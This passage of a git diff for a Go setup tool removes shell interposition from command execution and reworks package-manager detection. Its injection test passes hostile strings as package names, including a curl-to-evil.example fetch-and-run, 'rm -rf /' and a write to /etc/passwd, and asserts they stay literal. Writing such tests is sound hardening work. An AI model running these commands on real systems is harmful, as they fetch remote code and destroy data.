+// kernel actually receives. Under the previous implementation every assertion
+// below would instead see a three-element `sh -c "<joined string>"`.
+func argvOf(t *testing.T, cmd types.Command) []string {
+	t.Helper()
+	return buildCommand(cmd).Args
+}
+
+func TestBuildCommand_NoShellIsInterposed(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("sudo/sh semantics are POSIX-only")
 	}
 
-	// Test that struct fields are properly set
-	if cmd.Exec != "echo" {
-		t.Errorf("Expected Exec to be 'echo', got '%s'", cmd.Exec)
-	}
+	argv := argvOf(t, types.Command{Exec: "pacman", Args: []string{"-S", "vim"}})
 
-	if len(cmd.Args) != 2 {
-		t.Errorf("Expected Args length to be 2, got %d", len(cmd.Args))
+	for _, a := range argv {
+		if a == "sh" || a == "-c" {
+			t.Fatalf("a shell was interposed: %v", argv)
+		}
 	}
-
-	if cmd.Args[0] != "hello" || cmd.Args[1] != "world" {
-		t.Errorf("Expected Args to be ['hello', 'world'], got %v", cmd.Args)
-	}
-
-	if cmd.Variables["TEST_VAR"] != "test_value" {
-		t.Errorf("Expected Variables['TEST_VAR'] to be 'test_value', got '%s'", cmd.Variables["TEST_VAR"])
-	}
-
-	if cmd.LogName != "test.log" {
-		t.Errorf("Expected LogName to be 'test.log', got '%s'", cmd.LogName)
-	}
-
-	if cmd.AsUser != "testuser" {
-		t.Errorf("Expected AsUser to be 'testuser', got '%s'", cmd.AsUser)
-	}
-
-	if cmd.Interactive != false {
-		t.Errorf("Expected Interactive to be false, got %v", cmd.Interactive)
-	}
-
-	if cmd.Elevated != false {
-		t.Errorf("Expected Elevated to be false, got %v", cmd.Elevated)
+	if want := []string{"pacman", "-S", "vim"}; !equalArgs(argv, want) {
+		t.Errorf("argv = %#v, want %#v", argv, want)
 	}
 }
 
-func TestCommand_EmptyCommand(t *testing.T) {
-	cmd := types.Command{}
-
-	// Test zero values
-	if cmd.Exec != "" {
-		t.Errorf("Expected empty Exec, got '%s'", cmd.Exec)
+// A blueprint is data from a git repo. Shell metacharacters in a package name
+// must reach the package manager as literal text, never as syntax — especially
+// since package operations run elevated.
+func TestBuildCommand_ShellMetacharactersAreNotInterpreted(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("sudo/sh semantics are POSIX-only")
 	}
 
-	if len(cmd.Args) != 0 {
-		t.Errorf("Expected empty Args, got %v", cmd.Args)
+	payloads := []string{
+		"vim; touch /tmp/pwned",
+		"vim && curl evil.example/x.sh | sh",
+		"$(touch /tmp/pwned)",
+		"`touch /tmp/pwned`",
+		"vim\nrm -rf /",
+		"vim | tee /etc/passwd",
 	}
 
-	if len(cmd.Variables) != 0 {
-		t.Errorf("Expected empty Variables, got %v", cmd.Variables)
-	}
-
-	if cmd.LogName != "" {
-		t.Errorf("Expected empty LogName, got '%s'", cmd.LogName)
-	}
-
-	if cmd.AsUser != "" {
-		t.Errorf("Expected empty AsUser, got '%s'", cmd.AsUser)
-	}
-
-	if cmd.Interactive != false {
-		t.Errorf("Expected Interactive to be false, got %v", cmd.Interactive)
-	}
-
-	if cmd.Elevated != false {
-		t.Errorf("Expected Elevated to be false, got %v", cmd.Elevated)
-	}
-}
-
-func TestCommand_WithNilVariables(t *testing.T) {
-	cmd := types.Command{
-		Variables: nil, // Explicitly set to nil
-	}
-	_ = cmd.Exec // Assign values to avoid unused write warnings
-	_ = cmd.Args
-
-	// Should handle nil Variables gracefully
-	if cmd.Variables != nil {
-		t.Errorf("Expected Variables to be nil, got %v", cmd.Variables)
-	}
-
-	// Should be safe to check length of nil map
-	if len(cmd.Variables) != 0 {
-		t.Errorf("Expected Variables length to be 0, got %d", len(cmd.Variables))
-	}
-}
-
-func TestCommand_WithEmptyArgs(t *testing.T) {
-	cmd := types.Command{
-		Args: []string{}, // Empty args
-	}
-	_ = cmd.Exec // Assign value to avoid unused write warning
-
-	if len(cmd.Args) != 0 {
-		t.Errorf("Expected Args length to be 0, got %d", len(cmd.Args))
-	}
-}
-
-func TestCommand_WithSpecialCharacters(t *testing.T) {
-	cmd := types.Command{
-		Args: []string{"hello world", "special!@#$%^&*()", "unicode-ñáéíóú"},
-		Variables: map[string]string{
-			"SPECIAL_VAR": "value with spaces",
-			"UNICODE_VAR": "ñáéíóú",
-			"SYMBOLS_VAR": "!@#$%^&*()",
-		},
-	}
-	_ = cmd.Exec // Assign value to avoid unused write warning
-
-	// Test that special characters are preserved
-	if cmd.Args[0] != "hello world" {
-		t.Errorf("Expected Args[0] to be 'hello world', got '%s'", cmd.Args[0])
-	}
-
-	if cmd.Args[1] != "special!@#$%^&*()" {
-		t.Errorf("Expected Args[1] to contain special chars, got '%s'", cmd.Args[1])
-	}
-
-	if cmd.Variables["SPECIAL_VAR"] != "value with spaces" {
-		t.Errorf("Expected Variables to handle spaces, got '%s'", cmd.Variables["SPECIAL_VAR"])
-	}
-
-	if cmd.Variables["UNICODE_VAR"] != "ñáéíóú" {
-		t.Errorf("Expected Variables to handle unicode, got '%s'", cmd.Variables["UNICODE_VAR"])
-	}
-}
-
-// Mock tests for command execution - these test the structure without actually running commands.
-func TestCommand_ExecutionFlags(t *testing.T) {
-	testCases := []struct {
-		name        string
-		cmd         types.Command
-		expectedCmd string
-	}{
-		{
-			name: "Basic command",
-			cmd: types.Command{
-				Exec: "echo",
-				Args: []string{"hello"},
-			},
-			expectedCmd: "echo",
-		},
-		{
-			name: "Elevated command",
-			cmd: types.Command{
-				Exec:     "echo",
-				Args:     []string{"hello"},
+	for _, payload := range payloads {
+		t.Run(payload, func(t *testing.T) {
+			argv := argvOf(t, types.Command{
+				Exec:     "pacman",
+				Args:     []string{"-S", payload},
 				Elevated: true,
-			},
-			expectedCmd: "echo",
-		},
-		{
-			name: "User command",
-			cmd: types.Command{
-				Exec:   "echo",
-				Args:   []string{"hello"},
-				AsUser: "testuser",
-			},
-			expectedCmd: "echo",
-		},
-		{
-			name: "Interactive command",
-			cmd: types.Command{
-				Exec:        "echo",
-				Args:        []string{"hello"},
-				Interactive: true,
-			},
-			expectedCmd: "echo",
-		},
-	}
+			})
 
-	for _, tc := range testCases {
-		t.Run(tc.name, func(t *testing.T) {
-			if tc.cmd.Exec != tc.expectedCmd {
-				t.Errorf("Expected Exec to be '%s', got '%s'", tc.expectedCmd, tc.cmd.Exec)
+			want := []string{"sudo", "--", "pacman", "-S", payload}
+			if !equalArgs(argv, want) {
+				t.Fatalf("argv = %#v, want %#v", argv, want)
+			}
+			if got := argv[len(argv)-1]; got != payload {
+				t.Errorf("payload was split or rewritten: got %q, want %q", got, payload)
 			}
 		})
 	}
+}
+
+// The old implementation joined Args on spaces and let sh re-split them, so any
+// value containing a space silently became multiple arguments.
+func TestBuildCommand_ArgumentsWithSpacesStayIntact(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("sudo/sh semantics are POSIX-only")
+	}
+
+	comment := "Levi Smith (personal laptop)"
+	argv := argvOf(t, types.Command{
+		Exec: "ssh-keygen",
+		Args: []string{"-C", comment, "-N", ""},
+	})
+
+	want := []string{"ssh-keygen", "-C", comment, "-N", ""}
+	if !equalArgs(argv, want) {
+		t.Fatalf("argv = %#v, want %#v", argv, want)
+	}
+}
+
+// A crypt hash such as $6$rounds=... was expanded by the shell, silently
+// corrupting the password being set.
+func TestBuildCommand_PasswordHashIsNotExpanded(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("sudo/sh semantics are POSIX-only")
+	}
+
+	hash := "$6$rounds=656000$abcdef$ghijkl.mnop"
+	argv := argvOf(t, types.Command{
+		Exec:     "useradd",
+		Args:     []string{"--password", hash, "levi"},
+		Elevated: true,
+	})
+
+	if got := argv[len(argv)-2]; got != hash {
+		t.Errorf("password hash mangled: got %q, want %q", got, hash)
+	}
+}
+
+func TestBuildCommand_Elevation(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("sudo/sh semantics are POSIX-only")
+	}
+
+	tests := []struct {
+		name string
+		cmd  types.Command
+		want []string
+	}{
+		{
+			name: "not elevated runs directly",
+			cmd:  types.Command{Exec: "brew", Args: []string{"install", "jq"}},
+			want: []string{"brew", "install", "jq"},
+		},
+		{
+			name: "elevated prefixes sudo with -- terminator",
+			cmd:  types.Command{Exec: "apt", Args: []string{"install", "jq"}, Elevated: true},
+			want: []string{"sudo", "--", "apt", "install", "jq"},
+		},
+		{
+			name: "as-user uses sudo -u",
+			cmd:  types.Command{Exec: "paru", Args: []string{"-S", "jq"}, AsUser: "levi"},
+			want: []string{"sudo", "-u", "levi", "--", "paru", "-S", "jq"},
+		},
+		{
+			name: "elevated wins over as-user",
+			cmd:  types.Command{Exec: "apt", Args: []string{"update"}, Elevated: true, AsUser: "levi"},
+			want: []string{"sudo", "--", "apt", "update"},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := argvOf(t, tt.cmd); !equalArgs(got, tt.want) {
+				t.Errorf("argv = %#v, want %#v", got, tt.want)
+			}
+		})
+	}
+}
+
+// Providers that genuinely want a shell ask for one explicitly, and that still
+// works — the shell is declared in the provider definition rather than imposed on
+// every command. Mirrors the AUR helper bootstrap steps in paru/yay/aura/etc.
+func TestBuildCommand_ExplicitShellStillWorks(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("sudo/sh semantics are POSIX-only")
+	}
+
+	script := "cd /tmp/paru && makepkg -si --noconfirm"
+	argv := argvOf(t, types.Command{Exec: "sh", Args: []string{"-c", script}})
+
+	if want := []string{"sh", "-c", script}; !equalArgs(argv, want) {
+		t.Fatalf("argv = %#v, want %#v", argv, want)
+	}
+}
+
+// Non-elevated commands used to be handed to `sh -c`, which does not exist on
+// Windows, so essentially all non-elevated Windows execution failed.
+func TestBuildCommand_NeverUsesShOnWindows(t *testing.T) {
+	argv := argvOf(t, types.Command{Exec: "winget", Args: []string{"install", "git"}})
+
+	for _, a := range argv {
+		if a == "sh" || a == "-c" {
+			t.Fatalf("shell interposed on %s: %v", runtime.GOOS, argv)
+		}
+	}
+}
+
+// The log file used to be closed inside setOutputStreams, before the command
+// ever ran, so everything a script wrote went to a dead descriptor.
+func TestRunCommand_LogFileReceivesOutput(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("uses /bin/echo")
+	}
+
+	logPath := filepath.Join(t.TempDir(), "script.log")
+	const marker = "rwr-log-marker"
+
+	if err := RunCommand(types.Command{
+		Exec:    "/bin/echo",
+		Args:    []string{marker},
+		LogName: logPath,
+	}, false); err != nil {
+		t.Fatalf("RunCommand: %v", err)
+	}
+
+	got, err := os.ReadFile(logPath)
+	if err != nil {
+		t.Fatalf("reading log file: %v", err)
+	}
+	if !strings.Contains(string(got), marker) {
+		t.Errorf("log file = %q, want it to contain %q", got, marker)
+	}
+}
+
+// Building the right argv is not enough; it has to execute that way too.
+func TestRunCommand_ExecutesArgumentsVerbatim(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("uses /bin/echo")
+	}
+
+	logPath := filepath.Join(t.TempDir(), "out.log")
+	const arg = "one arg with spaces; not two"
+
+	if err := RunCommand(types.Command{
+		Exec:    "/bin/echo",
+		Args:    []string{arg},
+		LogName: logPath,
+	}, false); err != nil {
+		t.Fatalf("RunCommand: %v", err)
+	}
+
+	got, err := os.ReadFile(logPath)
+	if err != nil {
+		t.Fatalf("reading log: %v", err)
+	}
+	if strings.TrimSpace(string(got)) != arg {
+		t.Errorf("echoed %q, want %q", strings.TrimSpace(string(got)), arg)
+	}
+}
+
+func equalArgs(a, b []string) bool {
+	if len(a) != len(b) {
+		return false
+	}
+	for i := range a {
+		if a[i] != b[i] {
+			return false
+		}
+	}
+	return true
 }
 
 // Benchmark tests.
@@ -307,6 +352,6 @@ func BenchmarkGetBinPath(b *testing.B) {
 
 	b.ResetTimer()
 	for i := 0; i < b.N; i++ {
-		GetBinPath(command)
+		_, _ = GetBinPath(command)
 	}
 }

--- a/internal/system/distro.go
+++ b/internal/system/distro.go
@@ -7,6 +7,44 @@ import (
 	"github.com/charmbracelet/log"
 )
 
+// nativeManagers lists the package managers that belong to a distribution family,
+// in the order they should be preferred as the default.
+//
+// This is the mapping that makes "which package manager does this machine use?"
+// answerable without enumerating every derivative distribution. Families are few
+// and stable; derivatives are many and keep appearing.
+var nativeManagers = map[string][]string{
+	"arch":      {"paru", "yay", "trizen", "aura", "pamac", "pacman"},
+	"debian":    {"apt"},
+	"ubuntu":    {"apt"},
+	"fedora":    {"dnf"},
+	"rhel":      {"dnf"},
+	"suse":      {"zypper"},
+	"alpine":    {"apk"},
+	"void":      {"xbps"},
+	"gentoo":    {"emerge"},
+	"slackware": {"slackpkg"},
+	"solus":     {"eopkg"},
+}
+
+// managerFamily maps a package manager back to the family it identifies.
+//
+// Used to infer the family from what is installed when /etc/os-release names a
+// distribution nobody has heard of. A great many derivatives ship neither a known
+// ID nor an ID_LIKE — PrismLinux reports ID=prismlinux and nothing else — but the
+// presence of pacman and its database says "arch" unambiguously.
+var managerFamily = map[string]string{
+	"pacman":   "arch",
+	"apt":      "debian",
+	"dnf":      "fedora",
+	"zypper":   "suse",
+	"apk":      "alpine",
+	"xbps":     "void",
+	"emerge":   "gentoo",
+	"slackpkg": "slackware",
+	"eopkg":    "solus",
+}
+
 // Known distribution families and their variants.
 var distroFamilies = map[string][]string{
 	"arch":      {"endeavouros", "manjaro", "artix", "garuda", "blackarch", "archbang", "archcraft", "arcolinux", "acreetion"},
@@ -39,9 +77,9 @@ func GetDistroFamily(distro string) string {
 		}
 	}
 
-	// Check ID_LIKE in /etc/os-release for hints
-	idLike := getDistroIDLike()
-	if idLike != "" {
+	// Fall back to this machine's ID_LIKE, but only when the distro being asked
+	// about is this machine. See idLikeFor.
+	if idLike := idLikeFor(distro); idLike != "" {
 		for _, likeDistro := range strings.Split(idLike, " ") {
 			if _, exists := distroFamilies[likeDistro]; exists {
 				return likeDistro
@@ -71,13 +109,28 @@ func IsDistroInFamily(distro, family string) bool {
 		}
 	}
 
-	// Check ID_LIKE in /etc/os-release
-	idLike := getDistroIDLike()
-	if idLike != "" && strings.Contains(idLike, family) {
+	// Fall back to this machine's ID_LIKE, but only when the distro being asked
+	// about is this machine. See idLikeFor.
+	if idLike := idLikeFor(distro); idLike != "" && strings.Contains(idLike, family) {
 		return true
 	}
 
 	return false
+}
+
+// idLikeFor returns this machine's ID_LIKE, but only when distro names this
+// machine's own distribution.
+//
+// ID_LIKE describes the host and nothing else. Consulting it for an arbitrary
+// distro answered every question in terms of whatever the host happens to be:
+// on a Debian derivative (ID_LIKE=debian), IsDistroInFamily("arch", "debian")
+// returned true and GetDistroFamily on any unknown distro returned "debian".
+// That silently mapped unrecognised distributions onto the host's family.
+var idLikeFor = func(distro string) string {
+	if !strings.EqualFold(distro, getLinuxDistro()) {
+		return ""
+	}
+	return getDistroIDLike()
 }
 
 // getDistroIDLike returns the ID_LIKE field from /etc/os-release.

--- a/internal/system/executor.go
+++ b/internal/system/executor.go
@@ -1,0 +1,42 @@
+package system
+
+import (
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// Executor runs commands on behalf of the processors. It exists so command
+// construction can be observed in tests without spawning real processes: the
+// production implementation shells out, while tests substitute a recorder and
+// assert on the exact argv, elevation and environment each processor produced.
+type Executor interface {
+	// Run executes the command, streaming or capturing output per the command's
+	// Interactive and LogName settings.
+	Run(cmd types.Command, debug bool) error
+	// Output executes the command and returns its stdout.
+	Output(cmd types.Command, debug bool) (string, error)
+}
+
+// current is the executor used by RunCommand and RunCommandOutput.
+var current Executor = osExecutor{}
+
+// SetExecutor swaps in a different Executor and returns a function restoring the
+// previous one. Intended for tests:
+//
+//	rec := exectest.New()
+//	defer system.SetExecutor(rec)()
+func SetExecutor(e Executor) (restore func()) {
+	previous := current
+	current = e
+	return func() { current = previous }
+}
+
+// osExecutor is the production Executor; it runs commands as real processes.
+type osExecutor struct{}
+
+func (osExecutor) Run(cmd types.Command, debug bool) error {
+	return runCommand(cmd, debug)
+}
+
+func (osExecutor) Output(cmd types.Command, debug bool) (string, error) {
+	return runCommandOutput(cmd, debug)
+}

--- a/internal/system/linux.go
+++ b/internal/system/linux.go
@@ -2,6 +2,7 @@ package system
 
 import (
 	"os"
+	"sort"
 	"strings"
 
 	"github.com/charmbracelet/log"
@@ -13,70 +14,66 @@ import (
 func SetLinuxDetails(osInfo *types.OSInfo) error {
 	log.Debug("Setting Linux package manager details.")
 
-	// Initialize package manager map
-	if osInfo.PackageManager.Managers == nil {
-		osInfo.PackageManager.Managers = make(map[string]types.PackageManagerInfo)
-	}
+	collectAvailableManagers(osInfo)
+	setDefaultManager(osInfo, linuxPreferredManagers(osInfo))
 
-	// Get available providers
-	available := GetAvailableProviders()
-
-	// Add all available Linux package managers
-	for name, prov := range available {
-		// Skip if not a Linux provider
-		if !Contains(prov.Detection.Distributions, "linux") {
-			continue
-		}
-
-		if tool := FindTool(prov.Detection.Binary); tool.Exists {
-			osInfo.PackageManager.Managers[name] = GetPackageManagerInfo(prov, tool.Bin)
-			log.Debugf("Added package manager: %s", name)
-		}
-	}
-
-	// Get default from OS release
-	defaultPackageManager := GetDefaultProviderFromOSRelease()
-	if defaultPackageManager != "" && osInfo.PackageManager.Managers[defaultPackageManager].Bin != "" {
-		osInfo.PackageManager.Default = osInfo.PackageManager.Managers[defaultPackageManager]
-		log.Infof("Set %s as default package manager from OS release", defaultPackageManager)
-	} else {
-		// Check if this is an Arch-based distribution
-		if IsDistroInFamily(osInfo.System.OSFamily, "arch") {
-			// For Arch Linux, prioritize AUR helpers (in order of preference)
-			aurHelpers := []string{"paru", "yay", "trizen", "aura", "pamac"}
-			for _, helper := range aurHelpers {
-				if pm, exists := osInfo.PackageManager.Managers[helper]; exists && pm.Bin != "" {
-					osInfo.PackageManager.Default = pm
-					log.Infof("Set AUR helper %s as default package manager for Arch-based system", helper)
-					break
-				}
-			}
-
-			// If no AUR helper found, try pacman
-			if osInfo.PackageManager.Default.Name == "" {
-				if pm, exists := osInfo.PackageManager.Managers["pacman"]; exists && pm.Bin != "" {
-					osInfo.PackageManager.Default = pm
-					log.Infof("Set pacman as default package manager for Arch-based system")
-				}
-			}
-		} else {
-			// Otherwise use first available package manager as default
-			for _, pm := range osInfo.PackageManager.Managers {
-				osInfo.PackageManager.Default = pm
-				log.Infof("Set %s as default package manager", pm.Name)
-				break
-			}
-		}
-	}
-
-	// Debug log the final default package manager
 	if osInfo.PackageManager.Default.Name != "" {
 		log.Infof("Final default package manager: %s", osInfo.PackageManager.Default.Name)
-	} else {
-		log.Warn("No default package manager set")
 	}
 
 	return nil
+}
+
+// linuxPreferredManagers returns the default package manager preference order for
+// this system: the distribution family's own package managers, AUR helpers ahead
+// of bare pacman on Arch.
+//
+// Deriving the default from /etc/os-release directly does not work. That lookup
+// returned the first provider matching the distro, and flatpak, snap, nix and
+// cargo all declare the "linux" wildcard, so they match every distribution — on
+// this machine it selected flatpak as the default package manager for an
+// Arch-based system. Families map to their native managers explicitly instead.
+func linuxPreferredManagers(osInfo *types.OSInfo) []string {
+	family := linuxFamily(osInfo)
+	if family == "" {
+		log.Debug("Could not determine distribution family; falling back to alphabetical default")
+		return nil
+	}
+
+	log.Debugf("Distribution family resolved to %q", family)
+	return nativeManagers[family]
+}
+
+// linuxFamily determines which distribution family this machine belongs to,
+// preferring what /etc/os-release reports and falling back to what is installed.
+//
+// The fallback matters because derivative distributions routinely name themselves
+// something new and set no ID_LIKE, leaving nothing to match on. A machine with
+// pacman and /var/lib/pacman is Arch-family regardless of what it calls itself.
+func linuxFamily(osInfo *types.OSInfo) string {
+	if family := GetDistroFamily(osInfo.System.OSFamily); family != "" {
+		if _, known := nativeManagers[family]; known {
+			return family
+		}
+	}
+
+	// Infer from the package managers actually present. Sorted for determinism,
+	// though in practice a system carries only one native package manager.
+	installed := make([]string, 0, len(osInfo.PackageManager.Managers))
+	for name := range osInfo.PackageManager.Managers {
+		installed = append(installed, name)
+	}
+	sort.Strings(installed)
+
+	for _, name := range installed {
+		if family, ok := managerFamily[name]; ok {
+			log.Debugf("Distribution %q is unrecognised; inferred %q family from the presence of %s",
+				osInfo.System.OSFamily, family, name)
+			return family
+		}
+	}
+
+	return ""
 }
 
 // getLinuxDistro returns the Linux distribution name from /etc/os-release.
@@ -189,14 +186,4 @@ func fileExists(filename string) bool {
 		return false
 	}
 	return !info.IsDir()
-}
-
-// Contains checks if a string slice contains a string.
-func Contains(slice []string, str string) bool {
-	for _, s := range slice {
-		if s == str {
-			return true
-		}
-	}
-	return false
 }

--- a/internal/system/macos.go
+++ b/internal/system/macos.go
@@ -13,42 +13,8 @@ import (
 func SetMacOSDetails(osInfo *types.OSInfo) error {
 	log.Debug("Setting macOS package manager details.")
 
-	// Initialize package manager map
-	if osInfo.PackageManager.Managers == nil {
-		osInfo.PackageManager.Managers = make(map[string]types.PackageManagerInfo)
-	}
-
-	// Get available providers
-	available := GetAvailableProviders()
-
-	// Add all available macOS package managers
-	for name, prov := range available {
-		// Skip if not a macOS provider
-		if !Contains(prov.Detection.Distributions, "darwin") {
-			continue
-		}
-
-		if tool := FindTool(prov.Detection.Binary); tool.Exists {
-			osInfo.PackageManager.Managers[name] = GetPackageManagerInfo(prov, tool.Bin)
-			log.Debugf("Added package manager: %s", name)
-		}
-	}
-
-	// Set default package manager (prefer Homebrew)
-	if pm, exists := osInfo.PackageManager.Managers["brew"]; exists {
-		osInfo.PackageManager.Default = pm
-		log.Infof("Set Homebrew as default package manager")
-	} else if pm, exists := osInfo.PackageManager.Managers["macports"]; exists {
-		osInfo.PackageManager.Default = pm
-		log.Infof("Set MacPorts as default package manager")
-	} else {
-		// Use first available package manager as default
-		for _, pm := range osInfo.PackageManager.Managers {
-			osInfo.PackageManager.Default = pm
-			log.Infof("Set %s as default package manager", pm.Name)
-			break
-		}
-	}
+	collectAvailableManagers(osInfo)
+	setDefaultManager(osInfo, []string{"brew", "macports"})
 
 	return nil
 }

--- a/internal/system/managers.go
+++ b/internal/system/managers.go
@@ -1,0 +1,64 @@
+package system
+
+import (
+	"sort"
+
+	"github.com/charmbracelet/log"
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// collectAvailableManagers records every provider usable on this system in
+// osInfo.PackageManager.Managers.
+//
+// GetAvailableProviders has already applied supportsSystem (exact distro, distro
+// family, or the "linux" wildcard), confirmed the binary exists, and stored its
+// path in BinPath — so no further filtering belongs here. The per-OS callers used
+// to re-filter with a literal string match against the provider's distribution
+// list, which excluded every provider that names concrete distros: on Linux that
+// meant apt, dnf, pacman, zypper and the AUR helpers never made it into the map,
+// leaving cache cleaning and core-package resolution working off a map that held
+// only the wildcard providers.
+func collectAvailableManagers(osInfo *types.OSInfo) {
+	if osInfo.PackageManager.Managers == nil {
+		osInfo.PackageManager.Managers = make(map[string]types.PackageManagerInfo)
+	}
+
+	for name, prov := range GetAvailableProviders() {
+		osInfo.PackageManager.Managers[name] = GetPackageManagerInfo(prov, prov.BinPath)
+		log.Debugf("Added package manager: %s", name)
+	}
+}
+
+// setDefaultManager picks osInfo.PackageManager.Default as the first entry of
+// preferred that is actually present, falling back to the alphabetically first
+// available manager.
+//
+// The fallback is sorted rather than "whatever the map yields first": Go
+// randomizes map iteration, so the previous version could resolve a different
+// default on every run, meaning a package with no explicit package_manager could
+// be installed by a different tool each time.
+func setDefaultManager(osInfo *types.OSInfo, preferred []string) {
+	for _, name := range preferred {
+		if pm, ok := osInfo.PackageManager.Managers[name]; ok && pm.Bin != "" {
+			osInfo.PackageManager.Default = pm
+			log.Infof("Set %s as default package manager", pm.Name)
+			return
+		}
+	}
+
+	names := make([]string, 0, len(osInfo.PackageManager.Managers))
+	for name := range osInfo.PackageManager.Managers {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+
+	for _, name := range names {
+		if pm := osInfo.PackageManager.Managers[name]; pm.Bin != "" {
+			osInfo.PackageManager.Default = pm
+			log.Infof("Set %s as default package manager", pm.Name)
+			return
+		}
+	}
+
+	log.Warn("No default package manager set")
+}

--- a/internal/system/managers_test.go
+++ b/internal/system/managers_test.go
@@ -1,0 +1,513 @@
+package system
+
+import (
+	"os/exec"
+	"runtime"
+	"slices"
+	"sort"
+	"strings"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+func pm(name string) types.PackageManagerInfo {
+	return types.PackageManagerInfo{Name: name, Bin: "/usr/bin/" + name}
+}
+
+// The real embedded provider definitions must match the distributions they claim.
+// This is the bug class that excluded apt/dnf/pacman on every Linux system: the
+// per-OS setup filtered with a literal "linux" string match, so every provider
+// naming concrete distros (apt lists debian/ubuntu, pacman lists arch/cachyos/...)
+// was dropped. supportsSystem is the matcher that gets it right, and this test
+// pins that the shipped definitions actually resolve for real distributions.
+func TestSupportsSystem_MatchesShippedProvidersForRealDistros(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	tests := []struct {
+		distro   string
+		wantable []string
+	}{
+		{"debian", []string{"apt", "flatpak", "snap"}},
+		{"ubuntu", []string{"apt", "flatpak", "snap"}},
+		{"fedora", []string{"dnf", "flatpak"}},
+		{"arch", []string{"pacman", "paru", "yay", "flatpak"}},
+		{"cachyos", []string{"pacman", "paru", "yay"}},
+		{"manjaro", []string{"pacman", "paru"}},
+		{"opensuse-tumbleweed", []string{"zypper"}},
+		{"alpine", []string{"apk"}},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.distro, func(t *testing.T) {
+			for _, name := range tt.wantable {
+				provider, ok := loaded[name]
+				if !ok {
+					t.Fatalf("provider %q is not in the embedded definitions", name)
+				}
+				if !supportsSystem(provider, "linux", tt.distro) {
+					t.Errorf("provider %q should support linux/%s (distributions=%v)",
+						name, tt.distro, provider.Detection.Distributions)
+				}
+			}
+		})
+	}
+}
+
+// A provider must not be offered on a distro it does not support.
+func TestSupportsSystem_RejectsWrongDistro(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	// Simulate running on a Debian-derived host. Its ID_LIKE must not leak into
+	// answers about other distributions — that is what made apt look available on
+	// Arch when these ran on the Ubuntu CI runner.
+	restore := stubHost(t, "ubuntu", "debian")
+	defer restore()
+
+	tests := []struct {
+		provider string
+		distro   string
+	}{
+		{"apt", "arch"},
+		{"pacman", "debian"},
+		{"dnf", "ubuntu"},
+		{"apk", "fedora"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.provider+"/"+tt.distro, func(t *testing.T) {
+			provider, ok := loaded[tt.provider]
+			if !ok {
+				t.Fatalf("provider %q is not in the embedded definitions", tt.provider)
+			}
+			if supportsSystem(provider, "linux", tt.distro) {
+				t.Errorf("provider %q should not support linux/%s (distributions=%v)",
+					tt.provider, tt.distro, provider.Detection.Distributions)
+			}
+		})
+	}
+}
+
+// Providers that declare the "linux" wildcard stay available everywhere.
+func TestSupportsSystem_WildcardLinuxProvidersMatchAnyDistro(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	for _, name := range []string{"flatpak", "nix", "cargo"} {
+		provider, ok := loaded[name]
+		if !ok {
+			t.Fatalf("provider %q is not in the embedded definitions", name)
+		}
+		for _, distro := range []string{"debian", "arch", "fedora", "void"} {
+			if !supportsSystem(provider, "linux", distro) {
+				t.Errorf("wildcard provider %q should support linux/%s", name, distro)
+			}
+		}
+	}
+}
+
+func TestSetDefaultManager_UsesPreferenceOrder(t *testing.T) {
+	osInfo := &types.OSInfo{}
+	osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{
+		"pacman": pm("pacman"),
+		"yay":    pm("yay"),
+		"paru":   pm("paru"),
+	}
+
+	setDefaultManager(osInfo, []string{"paru", "yay", "trizen", "aura", "pamac", "pacman"})
+
+	if got := osInfo.PackageManager.Default.Name; got != "paru" {
+		t.Errorf("default = %q, want paru (first present preference)", got)
+	}
+}
+
+func TestSetDefaultManager_FallsThroughMissingPreferences(t *testing.T) {
+	osInfo := &types.OSInfo{}
+	osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{
+		"pacman": pm("pacman"),
+	}
+
+	setDefaultManager(osInfo, []string{"paru", "yay", "pacman"})
+
+	if got := osInfo.PackageManager.Default.Name; got != "pacman" {
+		t.Errorf("default = %q, want pacman", got)
+	}
+}
+
+// Go randomizes map iteration, so an unsorted fallback could resolve a different
+// default on every run — and with it, a different package manager for any package
+// that did not name one.
+func TestSetDefaultManager_FallbackIsDeterministic(t *testing.T) {
+	managers := map[string]types.PackageManagerInfo{
+		"snap":    pm("snap"),
+		"flatpak": pm("flatpak"),
+		"nix":     pm("nix"),
+		"cargo":   pm("cargo"),
+	}
+
+	first := ""
+	for i := 0; i < 100; i++ {
+		osInfo := &types.OSInfo{}
+		osInfo.PackageManager.Managers = managers
+
+		setDefaultManager(osInfo, nil)
+
+		got := osInfo.PackageManager.Default.Name
+		if i == 0 {
+			first = got
+			continue
+		}
+		if got != first {
+			t.Fatalf("default package manager is not deterministic: got %q then %q", first, got)
+		}
+	}
+
+	if first != "cargo" {
+		t.Errorf("fallback default = %q, want cargo (alphabetically first)", first)
+	}
+}
+
+func TestSetDefaultManager_NoManagersLeavesDefaultEmpty(t *testing.T) {
+	osInfo := &types.OSInfo{}
+	osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{}
+
+	setDefaultManager(osInfo, []string{"brew"})
+
+	if got := osInfo.PackageManager.Default.Name; got != "" {
+		t.Errorf("default = %q, want empty", got)
+	}
+}
+
+// mustLoadEmbedded returns the embedded provider definitions. Reading them
+// directly means these assertions hold on any machine, whether or not the
+// corresponding package manager binaries are installed.
+func mustLoadEmbedded(t *testing.T) map[string]*types.Provider {
+	t.Helper()
+	loaded, err := LoadEmbeddedProviders()
+	if err != nil {
+		t.Fatalf("LoadEmbeddedProviders: %v", err)
+	}
+	return loaded
